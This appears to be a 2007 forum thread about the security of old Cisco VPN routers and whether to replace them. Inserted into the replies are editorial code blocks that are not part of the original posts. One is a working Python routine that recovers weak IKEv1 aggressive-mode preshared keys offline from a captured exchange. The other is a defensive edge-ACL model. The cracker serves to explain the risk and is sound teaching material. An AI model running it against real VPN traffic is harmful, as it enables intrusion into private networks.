Posted by sali on November 26, 2007, 6:29 pm
We have a corporate VPN network with Cisco 1721 and Cisco 805 routers over the internet. Since it is quite old equipment, can somebody advise how secure those tunnels going over the internet are today?

As I understand it, they depend on a secret preshared key of a certain bit-length. With computational power rising dramatically, is there a danger that somebody on the net may break the security of those VPN tunnels, either by reading the data or even by injecting something into the stream?

So, do I need to worry, or are these routers and their VPN settings still safe? Thanks
Posted by Brian V on November 26, 2007, 6:47 pm
The only real vulnerability on a VPN tunnel is what's called a man-in-the-middle attack. That would have to happen at one of the two physical locations or at one of the POPs that the traffic passes through. A "user" who is simply on the internet cannot simply break into your tunnel. There are lots of other things you should be worried about besides the tunnel. Both pieces of equipment are EOL/EOS, which means they are running outdated software that most certainly has vulnerabilities. I'd be more worried about that than the tunnel!
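The original question, whether rising computing power lets someone on the net break a tunnel that rests on a preshared key, can be made concrete. What follows is an added example, not code from this thread or from Cisco: a Python model of IKEv1 aggressive-mode preshared-key authentication as RFC 2409 defines it (SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)), with HMAC-SHA1 standing in for the negotiated prf. In aggressive mode every input to HASH_R other than the PSK is sent unencrypted, and so is HASH_R itself, so anyone who can capture one exchange can test PSK guesses offline without sending a single packet to either router; main mode sends the hashes encrypted, which is why this particular shortcut does not apply to a passive observer there. The nonces, cookies, SA proposal, identity, wordlist and the key "cisco123" are all constructed for the demonstration, not taken from a capture. The point the output makes is that what the attacker's compute buys is proportional to how guessable the PSK is, not to the bit-length of the keys derived from it.

```python
import hashlib
import hmac
import itertools
import os
import secrets
import string
from typing import Dict, Iterable, Iterator, Optional, Tuple

# Simplified IKEv1 aggressive-mode PSK authentication (RFC 2409, sections 5 and 5.4).
# Field names follow the RFC; every value below is constructed for the example.


def prf(key: bytes, data: bytes) -> bytes:
    """The negotiated prf; HMAC-SHA1 is used here as a stand-in."""
    return hmac.new(key, data, hashlib.sha1).digest()


def hash_r(psk: bytes, exch: Dict[str, bytes]) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b),
    where SKEYID = prf(PSK, Ni_b | Nr_b) for preshared-key authentication."""
    skeyid = prf(psk, exch["ni"] + exch["nr"])
    return prf(skeyid, exch["gxr"] + exch["gxi"] + exch["cky_r"]
               + exch["cky_i"] + exch["sai"] + exch["idir"])


def capture_exchange(psk: bytes) -> Tuple[Dict[str, bytes], bytes]:
    """Stand-in for sniffing one aggressive-mode exchange. Everything in `exch`
    crosses the wire in the clear (nonces, DH public values, ISAKMP cookies, the
    initiator's SA proposal body, the responder's ID), and so does HASH_R."""
    exch = {
        "ni": os.urandom(16), "nr": os.urandom(16),        # nonces
        "gxi": os.urandom(128), "gxr": os.urandom(128),    # DH public values, 1024-bit group
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),    # ISAKMP cookies
        "sai": b"\x00\x00\x00\x01" + b"3DES-SHA1-MODP1024",          # constructed SA body
        "idir": b"\x01\x11\x00\x00" + bytes([203, 0, 113, 10]),     # ID_IPV4_ADDR, TEST-NET-3
    }
    return exch, hash_r(psk, exch)


def candidate_psks(wordlist: Iterable[bytes], max_len: int = 3) -> Iterator[bytes]:
    """Dictionary words first, then every lowercase string up to max_len. The
    brute-force part grows as 26**n; that is what "rising computational power"
    eats into, and a dictionary word never benefits from it at all."""
    yield from wordlist
    for n in range(1, max_len + 1):
        for tup in itertools.product(string.ascii_lowercase, repeat=n):
            yield "".join(tup).encode()


def crack_psk(exch: Dict[str, bytes], observed_hash_r: bytes,
              wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline guess: recompute HASH_R per candidate and compare. Nothing is sent
    to the VPN routers once the exchange has been seen."""
    for guess in candidate_psks(wordlist):
        if hmac.compare_digest(hash_r(guess, exch), observed_hash_r):
            return guess
    return None


WORDLIST = [b"password", b"cisco", b"cisco123", b"vpn123", b"branch01", b"changeme"]  # constructed


def demo() -> Tuple[Optional[bytes], Optional[bytes]]:
    """A weak PSK falls to the wordlist; a random 192-bit PSK survives the same attempt."""
    weak_exch, weak_h = capture_exchange(b"cisco123")
    strong_psk = secrets.token_urlsafe(24).encode()      # 24 random bytes, base64url encoded
    strong_exch, strong_h = capture_exchange(strong_psk)
    return crack_psk(weak_exch, weak_h, WORDLIST), crack_psk(strong_exch, strong_h, WORDLIST)


if __name__ == "__main__":
    weak, strong = demo()
    print("weak PSK recovered:  ", weak)
    print("strong PSK recovered:", strong)
```

The same routine recovers any short alphabetic PSK by brute force alone (run `crack_psk` with an empty wordlist against an exchange built from a three-letter key), which is the honest answer to the bit-length worry: the session keys can be as long as the algorithm allows, but the attacker only has to guess what the two routers were configured with.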
Posted by sali on November 26, 2007, 7:28 pm
Well, they were quite expensive, and for many years they have worked quite well [we have a simple star topology, with static routes, no dynamic connections coming from outside].

Since they are outdated EOL/EOS, does it mean they have to be replaced with new [also expensive] ones, or can we simply wait until some of them experience some fatal hardware shock and replace them then?

I am in the process of interrogating my network and trying to estimate potential threats and a cost analysis. Any experience and advice is helpful. Thanks

>> we have a corporate VPN network with Cisco 1721 and Cisco 805 routers over
>> the internet
>> since it is quite old equipment, can somebody advise how secure those
>> tunnels going over the internet are today?
>> thnx
>
> Both pieces of equipment are EOL/EOS which means they are running
> outdated software that most certainly has vulnerabilities.
Posted by Brian V on November 26, 2007, 10:53 pm
>>> we have a corporate VPN network with Cisco 1721 and Cisco 805 routers over
>>> the internet
>>> since it is quite old equipment, can somebody advise how secure those
>>> tunnels going over the internet are today?
>>> thnx
>>
>> Both pieces of equipment are EOL/EOS which means they are running
>> outdated software that most certainly has vulnerabilities.
>
> well, they were quite expensive, and for many years they have worked quite
> well [we have a simple star topology, with static routes, no dynamic
> connections coming from outside]
>
> since they are outdated EOL/EOS, does it mean they have to be replaced
> with new [also expensive] ones, or can we simply wait until some of them
> experience some fatal hardware shock and replace them then?
>
> I am in the process of interrogating my network and trying to estimate
> potential threats and a cost analysis
>
> any experience and advice is helpful
> thnx

Please don't top post; it makes it very difficult for people to read and respond to the threads.

A simple "star" topology would be referring to a private infrastructure, not a publicly facing VPN setup. If by star you are referring to the VPN tunnels that you have, then yes, without question you should be running modern, updated equipment running current software. As attack signatures and vulnerabilities are introduced, vendors bring out updated software to address those attacks. On your outdated equipment those vulnerabilities still exist and can be exploited. Internal routers are a different story in my opinion; those can run "older" software, as they are not public facing and do not face the same exploits that edge routers face.

You comment on equipment being "expensive"; I beg to differ. Equipment these days is very reasonably priced. A modern 2801 router probably costs less than you paid for the 1700 series you have. What is the cost of your corporate private information? What would it cost you if your customer information was stolen? Is it worth more than the couple grand you'll pay for a new edge router? If so, then you have your answer already.

In addition to that, VPN should never be run from the edge router; it should be run from a corporate firewall or dedicated VPN appliance. Edge internet routers should be doing simple filtering, anti-spoofing, simple exploit stuff to keep the load off the firewall. A properly designed and implemented network edge may be much more reasonably priced than you think.
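The division of labour Brian V describes, an edge router that only filters and anti-spoofs while a firewall or dedicated appliance terminates the tunnels, can be written down as a policy and checked against packets before it is typed into a router. The following is an added example, not configuration from this thread or from Cisco: a Python model of the inbound filter on the internet-facing interface that drops anything claiming an inside or bogon source, lets only IKE (UDP/500), NAT-T (UDP/4500) and ESP through to the VPN appliance, denies everything else, and prints the equivalent IOS numbered extended ACL. The inside prefix 10.0.0.0/8, the appliance address 203.0.113.10 (TEST-NET-3) and the sample packets are assumed for the demonstration.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed addressing for the demonstration.
VPN_APPLIANCE = ipaddress.ip_address("203.0.113.10")   # firewall / VPN appliance behind the edge router
INSIDE_NETS = [ipaddress.ip_network("10.0.0.0/8")]      # corporate space: never a valid source from outside
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12",
    "192.168.0.0/16", "224.0.0.0/4",
)]
IKE_PORTS = (500, 4500)   # ISAKMP and NAT-T


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str                  # "udp", "tcp", "esp", "icmp", ...
    dport: Optional[int] = None


def ingress_verdict(pkt: Packet) -> Tuple[str, str]:
    """Inbound filter on the internet-facing interface, evaluated top-down like an ACL.
    Returns (verdict, reason)."""
    src, dst = ipaddress.ip_address(pkt.src), ipaddress.ip_address(pkt.dst)
    if any(src in n for n in INSIDE_NETS):
        return "deny", "anti-spoof: inside source arriving from the internet"
    if any(src in n for n in BOGONS):
        return "deny", "bogon source"
    if dst == VPN_APPLIANCE and pkt.proto == "udp" and pkt.dport in IKE_PORTS:
        return "permit", "IKE/NAT-T to the VPN appliance"
    if dst == VPN_APPLIANCE and pkt.proto == "esp":
        return "permit", "ESP to the VPN appliance"
    return "deny", "implicit deny"


def ios_acl(number: int = 110) -> List[str]:
    """The same policy as IOS extended ACL lines. IOS uses wildcard masks
    (the inverse of the netmask), which ipaddress exposes as hostmask."""
    lines = []
    for n in INSIDE_NETS + BOGONS:
        lines.append(f"access-list {number} deny ip {n.network_address} {n.hostmask} any log")
    lines.append(f"access-list {number} permit udp any host {VPN_APPLIANCE} eq isakmp")
    lines.append(f"access-list {number} permit udp any host {VPN_APPLIANCE} eq non500-isakmp")
    lines.append(f"access-list {number} permit esp any host {VPN_APPLIANCE}")
    lines.append(f"access-list {number} deny ip any any log")
    return lines


SAMPLE_PACKETS = [  # constructed
    Packet("10.1.2.3", "203.0.113.10", "udp", 500),       # spoofed inside source
    Packet("192.168.1.5", "203.0.113.10", "esp"),         # RFC 1918 source on the internet side
    Packet("198.51.100.7", "203.0.113.10", "udp", 500),   # remote site's IKE
    Packet("198.51.100.7", "203.0.113.10", "udp", 4500),  # remote site behind NAT
    Packet("198.51.100.7", "203.0.113.10", "esp"),        # the tunnel traffic itself
    Packet("198.51.100.7", "203.0.113.10", "tcp", 23),    # telnet probe at the appliance
    Packet("198.51.100.7", "203.0.113.11", "udp", 500),   # IKE aimed at something else inside
]


def evaluate_samples() -> List[Tuple[Packet, str, str]]:
    return [(p, *ingress_verdict(p)) for p in SAMPLE_PACKETS]


if __name__ == "__main__":
    for pkt, verdict, why in evaluate_samples():
        print(f"{verdict:6} {pkt.src:>14} -> {pkt.dst}/{pkt.proto}"
              f"{'/' + str(pkt.dport) if pkt.dport else ''}: {why}")
    print()
    print("\n".join(ios_acl()))
```

The ACL is applied inbound on the outside interface (`ip access-group 110 in`); an `ip verify unicast source reachable-via rx` check on the same interface is the usual complement for the anti-spoofing lines. Nothing here lets management protocols reach the router or the appliance from the internet, which is the other half of keeping an old edge box out of trouble.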
Posted by sali on November 27, 2007, 2:52 am
In the newsgroup message 6sednWDi-opzCdbanZ2dnUVZ_oCvnZ2d@comcast.com...

>>>> we have a corporate VPN network with Cisco 1721 and Cisco 805 routers
>>>> over the internet
>>>> since it is quite old equipment, can somebody advise how secure those
>>>> tunnels going over the internet are today?
>>>> thnx
>>>
>>> Both pieces of equipment are EOL/EOS which means they are running
>>> outdated software that most certainly has vulnerabilities.
>>
>> well, they were quite expensive, and for many years they have worked quite
>> well [we have a simple star topology, with static routes, no dynamic
>> connections coming from outside]
>>
>> since they are outdated EOL/EOS, does it mean they have to be replaced
>> with new [also expensive] ones, or can we simply wait until some of them
>> experience some fatal hardware shock and replace them then?
>>
>> I am in the process of interrogating my network and trying to estimate
>> potential threats and a cost analysis
>>
>> any experience and advice is helpful
>> thnx
>
> A simple "star" topology would be referring to a private infrastructure,
> not a publicly facing VPN setup. If by star you are referring to the VPN
> tunnels that you have, then yes, without question you should be running
> modern, updated equipment running current software. As attack signatures
> and vulnerabilities are introduced, vendors bring out updated software to
> address those attacks. On your outdated equipment those vulnerabilities
> still exist and can be exploited. Internal routers are a different story
> in my opinion; those can run "older" software, as they are not public
> facing and do not face the same exploits that edge routers face.
>
> You comment on equipment being "expensive"; I beg to differ. Equipment
> these days is very reasonably priced. A modern 2801 router probably costs
> less than you paid for the 1700 series you have. What is the cost of your
> corporate private information? What would it cost you if your customer
> information was stolen? Is it worth more than the couple grand you'll pay
> for a new edge router? If so, then you have your answer already.
>
> In addition to that, VPN should never be run from the edge router; it
> should be run from a corporate firewall or dedicated VPN appliance. Edge
> internet routers should be doing simple filtering, anti-spoofing, simple
> exploit stuff to keep the load off the firewall. A properly designed and
> implemented network edge may be much more reasonably priced than you
> think.

Thanks for your suggestions. They can help me present maintenance and upgrade costs to my management [as they are always "cutting" the costs].